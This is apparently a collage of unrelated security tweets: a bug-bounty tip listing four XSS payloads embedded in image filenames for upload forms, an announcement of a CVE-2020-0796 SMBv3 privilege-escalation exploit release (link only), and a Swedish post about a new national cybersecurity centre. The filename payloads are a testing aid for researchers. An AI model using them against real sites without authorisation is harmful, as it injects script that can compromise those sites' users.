#BugBounty
If you find a file upload function for an image, try introducing an image with XSS in the filename like so:
<img src=x onerror=alert('XSS')>.png
"><img src=x onerror=alert('XSS')>.png
"><svg onmouseover=alert(1)>.svg
<<script>alert('xss')<!--a-->a.png
During this quarantine I've been researching with my colleague Manu (@dialluvioso_) the latest SMBv3 bug (CVE-2020-0796), we've achieved a local privilege escalation.
We're releasing the exploit code at github.com/danigargu/CVE-…
Jag har bloggat om det nya Svenska nationella cybersäkerhetscentret som kommer att upprättas på MSB (Swedish Civil Contingencies Agency) kryptera.se/nytt-nationell…
/Jonas Lejon ✳️